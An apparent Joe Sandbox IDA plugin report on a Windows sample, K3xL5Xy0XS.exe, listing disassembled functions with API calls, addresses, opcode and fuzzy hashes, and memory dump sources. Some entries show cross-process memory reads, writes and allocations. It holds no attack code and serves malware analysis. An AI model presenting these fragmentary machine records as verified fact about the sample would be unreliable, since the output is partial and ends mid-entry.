                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: f2fc54e24efa9ebf101fe06430db319662a6cac7905065b17bb8a05e5a705d68
                                                                                  • Instruction ID: 11f16685e91e01b11c9d6c79ff0d1e18001bceb6f19736087f1bcdaa2e84d780
                                                                                  • Opcode Fuzzy Hash: f2fc54e24efa9ebf101fe06430db319662a6cac7905065b17bb8a05e5a705d68
                                                                                  • Instruction Fuzzy Hash: 67F04F35100315BFDB215FA5AC4DF5A3BADEF89762F204414F949C6291DA70DC508A60
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0022102A
                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00221036
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221045
                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0022104C
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221062
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: d270a073beb42a4b020c3eb3113029218302ca6d9e2addbf1d085c71762e48ae
                                                                                  • Instruction ID: c6501fd083a06f2767cf2b9f076cce7fb1b2364056349fbc75b6b3cd9776b7c0
                                                                                  • Opcode Fuzzy Hash: d270a073beb42a4b020c3eb3113029218302ca6d9e2addbf1d085c71762e48ae
                                                                                  • Instruction Fuzzy Hash: B2F04F35100365BFDB215FA5FC4DF5A3BADEF89762F204414F945C6290DA70D9908A60
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230324
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230331
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 0023033E
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 0023034B
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230358
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0023017D,?,002332FC,?,00000001,00202592,?), ref: 00230365
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: a4fccc5452159490f78d16a384c144c0f43a90fba9861f4a537c33d027e58697
                                                                                  • Instruction ID: 822e9509586c9466a43eb0ce1f27c229c13f8eab7240f2efb1d9c27c5a6ec59e
                                                                                  • Opcode Fuzzy Hash: a4fccc5452159490f78d16a384c144c0f43a90fba9861f4a537c33d027e58697
                                                                                  • Instruction Fuzzy Hash: BA0190B2810B169FC730AF66D8D0416F7F9BF502153158A7ED19652931C371A964CE90
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 001FD752
                                                                                    • Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
                                                                                    • Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0
                                                                                  • _free.LIBCMT ref: 001FD764
                                                                                  • _free.LIBCMT ref: 001FD776
                                                                                  • _free.LIBCMT ref: 001FD788
                                                                                  • _free.LIBCMT ref: 001FD79A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 268f8d9f082295f396226b1adf5a9e1c127577137cb86130754153f6df27be21
                                                                                  • Instruction ID: c7081c9f518bd493ce0c41880d10a03698f80e95d29fc4e3e4d7e02d8b69a970
                                                                                  • Opcode Fuzzy Hash: 268f8d9f082295f396226b1adf5a9e1c127577137cb86130754153f6df27be21
                                                                                  • Instruction Fuzzy Hash: 3AF0623258161DAB8621FB64F9C6C3A77DEBB443187A40905F248EB511C730FC808770
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00225C58
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00225C6F
                                                                                  • MessageBeep.USER32(00000000), ref: 00225C87
                                                                                  • KillTimer.USER32(?,0000040A), ref: 00225CA3
                                                                                  • EndDialog.USER32(?,00000001), ref: 00225CBD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: 536c63331807d0198a8b9f0a217bec1009d94b4c55f6bc8e486c47a173056850
                                                                                  • Instruction ID: dacd71816ff68465b3f23a32e3a250604c889c873e0e426fdbbe92058865b2fa
                                                                                  • Opcode Fuzzy Hash: 536c63331807d0198a8b9f0a217bec1009d94b4c55f6bc8e486c47a173056850
                                                                                  • Instruction Fuzzy Hash: D4018630510B24AFEB215F50FD4EFA677BCBB04B06F00455AB583A14E1FBF4AA948A94
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 001F22BE
                                                                                    • Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
                                                                                    • Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0
                                                                                  • _free.LIBCMT ref: 001F22D0
                                                                                  • _free.LIBCMT ref: 001F22E3
                                                                                  • _free.LIBCMT ref: 001F22F4
                                                                                  • _free.LIBCMT ref: 001F2305
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 70169a9da54ccdb711db65d19e9a9fbd5730edd6e8a7c619f24f13eadd43bb1c
                                                                                  • Instruction ID: 448cd381249e3199ac198f6f65bc59f7ceb6b3a59177402ad513217b6ea8f5a6
                                                                                  • Opcode Fuzzy Hash: 70169a9da54ccdb711db65d19e9a9fbd5730edd6e8a7c619f24f13eadd43bb1c
                                                                                  • Instruction Fuzzy Hash: 60F05EB588193A8F8713BF54BC498283B64FB28760710051BF918D73B1CB700921AFE4
                                                                                  APIs
                                                                                  • EndPath.GDI32(?), ref: 001D95D4
                                                                                  • StrokeAndFillPath.GDI32(?,?,002171F7,00000000,?,?,?), ref: 001D95F0
                                                                                  • SelectObject.GDI32(?,00000000), ref: 001D9603
                                                                                  • DeleteObject.GDI32 ref: 001D9616
                                                                                  • StrokePath.GDI32(?), ref: 001D9631
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: fd0e244cb8873828d724151d34ddf51abd465a25f5fb1867fafa2e9ca3bc76c0
                                                                                  • Instruction ID: e890abc361bfb7e2eed130ccb32d40065aeb1298079e2dd6344f879268f7ae3a
                                                                                  • Opcode Fuzzy Hash: fd0e244cb8873828d724151d34ddf51abd465a25f5fb1867fafa2e9ca3bc76c0
                                                                                  • Instruction Fuzzy Hash: 5AF0373100674AEFEB265F6AFD5CB683B61EB003A2F148226F429551F0D73189A5DF24
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: __freea$_free
                                                                                  • String ID: a/p$am/pm
                                                                                  • API String ID: 3432400110-3206640213
                                                                                  • Opcode ID: 1105c0dcdcaa5e1fe09cca2a3a5c15fddd65aa111e6a3729975c7df8f5a24b3d
                                                                                  • Instruction ID: 03d7d3d7f528ce3b9a7cfd9ad0282f88b60f63974b1c781352d1d040fbed867b
                                                                                  • Opcode Fuzzy Hash: 1105c0dcdcaa5e1fe09cca2a3a5c15fddd65aa111e6a3729975c7df8f5a24b3d
                                                                                  • Instruction Fuzzy Hash: F4D1133190420EFADB289F68C855BFEB7B2FF15320F290159EB02AB651D7759D80CB91
                                                                                  APIs
                                                                                    • Part of subcall function 001E0242: EnterCriticalSection.KERNEL32(0029070C,00291884,?,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E024D
                                                                                    • Part of subcall function 001E0242: LeaveCriticalSection.KERNEL32(0029070C,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E028A
                                                                                    • Part of subcall function 001E00A3: __onexit.LIBCMT ref: 001E00A9
                                                                                  • __Init_thread_footer.LIBCMT ref: 00246238
                                                                                    • Part of subcall function 001E01F8: EnterCriticalSection.KERNEL32(0029070C,?,?,001D8747,00292514), ref: 001E0202
                                                                                    • Part of subcall function 001E01F8: LeaveCriticalSection.KERNEL32(0029070C,?,001D8747,00292514), ref: 001E0235
                                                                                    • Part of subcall function 0023359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002335E4
                                                                                    • Part of subcall function 0023359C: LoadStringW.USER32(00292390,?,00000FFF,?), ref: 0023360A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                  • String ID: x#)$x#)$x#)
                                                                                  • API String ID: 1072379062-3282413808
                                                                                  • Opcode ID: 5b372a0e7a5a01a025457d28b4fd50bd9c8031c74cab460dd530416786f280dd
                                                                                  • Instruction ID: bef4d96449f858e5bf1ec34e511ab0391caf5319eb5095d0b8917e9acbead975
                                                                                  • Opcode Fuzzy Hash: 5b372a0e7a5a01a025457d28b4fd50bd9c8031c74cab460dd530416786f280dd
                                                                                  • Instruction Fuzzy Hash: C0C1A171A10106AFCB28DF98C894EBEB7B9FF59300F14806AF9059B291DB70ED55CB91
                                                                                  APIs
                                                                                    • Part of subcall function 0022B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002221D0,?,?,00000034,00000800,?,00000034), ref: 0022B42D
                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00222760
                                                                                    • Part of subcall function 0022B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0022B3F8
                                                                                    • Part of subcall function 0022B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0022B355
                                                                                    • Part of subcall function 0022B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00222194,00000034,?,?,00001004,00000000,00000000), ref: 0022B365
                                                                                    • Part of subcall function 0022B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00222194,00000034,?,?,00001004,00000000,00000000), ref: 0022B37B
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002227CD
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0022281A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                  • String ID: @
                                                                                  • API String ID: 4150878124-2766056989
                                                                                  • Opcode ID: f18aa66c3a3a682640f35443c3d805b2af87132992f6445e5088a3bb7932955f
                                                                                  • Instruction ID: c971619a47e3806b753d3cb175723542f1ae7483b0d8d783c55c636b989552d1
                                                                                  • Opcode Fuzzy Hash: f18aa66c3a3a682640f35443c3d805b2af87132992f6445e5088a3bb7932955f
                                                                                  • Instruction Fuzzy Hash: D0415D72900228BFDB15DFA4DC85ADEBBB8EF05300F104095FA55B7181DB71AE59CB61
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\K3xL5Xy0XS.exe,00000104), ref: 001F1769
                                                                                  • _free.LIBCMT ref: 001F1834
                                                                                  • _free.LIBCMT ref: 001F183E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Users\user\Desktop\K3xL5Xy0XS.exe
                                                                                  • API String ID: 2506810119-1076347692
                                                                                  • Opcode ID: 5f80be5193eda022a67a830bd1b2039aa5c36ea0c063ff0f00ebdff1723d884b
                                                                                  • Instruction ID: c32d8c5ccbf348834fa184c67f25358eb4b4f056bdca0a641bb5eb98ea4eef52
                                                                                  • Opcode Fuzzy Hash: 5f80be5193eda022a67a830bd1b2039aa5c36ea0c063ff0f00ebdff1723d884b
                                                                                  • Instruction Fuzzy Hash: BF31AE71E4025DFFCB21EB9A9985DAEBBFCEB95350F10416AFA0497211D7708E40CB90
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0022C306
                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 0022C34C
                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00291990,014E5D00), ref: 0022C395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                  • String ID: 0
                                                                                  • API String ID: 135850232-4108050209
                                                                                  • Opcode ID: 660105b0041a80d8bafe55902d7134f374393178bea8086178243cc0df4ff1b4
                                                                                  • Instruction ID: 645ab0df0f497457a1a38a4995bac2af59e909a130e3845028833b177364d1c5
                                                                                  • Opcode Fuzzy Hash: 660105b0041a80d8bafe55902d7134f374393178bea8086178243cc0df4ff1b4
                                                                                  • Instruction Fuzzy Hash: 7541D231214352AFD720DF64EC84B5EBBE4AF95310F208A6DF8A5972D1D770E914CB52
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0025CC08,00000000,?,?,?,?), ref: 002544AA
                                                                                  • GetWindowLongW.USER32 ref: 002544C7
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002544D7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long
                                                                                  • String ID: SysTreeView32
                                                                                  • API String ID: 847901565-1698111956
                                                                                  • Opcode ID: 9c3df92d181a70a2af27949f05923f29e4c4caaba46f500be39ab89796b81117
                                                                                  • Instruction ID: 019b00f4a4f37da5aa3759f23090312cf059187a5af6e7bc71b6122cfd306001
                                                                                  • Opcode Fuzzy Hash: 9c3df92d181a70a2af27949f05923f29e4c4caaba46f500be39ab89796b81117
                                                                                  • Instruction Fuzzy Hash: 5031B231260206AFDF119E38DC45BEAB7A9EB18339F204315FD75A21D0E770ECA49754
                                                                                  APIs
                                                                                  • SysReAllocString.OLEAUT32(?,?), ref: 00226EED
                                                                                  • VariantCopyInd.OLEAUT32(?,?), ref: 00226F08
                                                                                  • VariantClear.OLEAUT32(?), ref: 00226F12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyString
                                                                                  • String ID: *j"
                                                                                  • API String ID: 2173805711-2162809069
                                                                                  • Opcode ID: 192e6712ce9d3d21a8436dd1ea84b64ff0f28c69e0e265c7ee899a482e191c35
                                                                                  • Instruction ID: 38d0de1b309d18a2bed3dc62b377a23f2fdc9819f0ee85c5b00be181329e7d1c
                                                                                  • Opcode Fuzzy Hash: 192e6712ce9d3d21a8436dd1ea84b64ff0f28c69e0e265c7ee899a482e191c35
                                                                                  • Instruction Fuzzy Hash: 6F319072628265EFCF05AFA4F999DBD37B5EF55300B600498F8038B6A1C770D922DB90
                                                                                  APIs
                                                                                    • Part of subcall function 0024335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00243077,?,?), ref: 00243378
                                                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0024307A
                                                                                  • _wcslen.LIBCMT ref: 0024309B
                                                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00243106
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 946324512-2422070025
                                                                                  • Opcode ID: 81640aee0b067bf0fc99e91fa2d4469fb8d9009c34e92bc73ae6838a13797332
                                                                                  • Instruction ID: b6ddbd513e24cfa3ef97a2c7cb85a2867328b345667729bf4f599726f4dc0a8b
                                                                                  • Opcode Fuzzy Hash: 81640aee0b067bf0fc99e91fa2d4469fb8d9009c34e92bc73ae6838a13797332
                                                                                  • Instruction Fuzzy Hash: A931E735210206DFDB18CF68C485EA977E0EF14318F248199E9199F392D772DE55CB60
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00254705
                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00254713
                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0025471A
                                                                                  Strings
                                                                                  Memory Dump Source
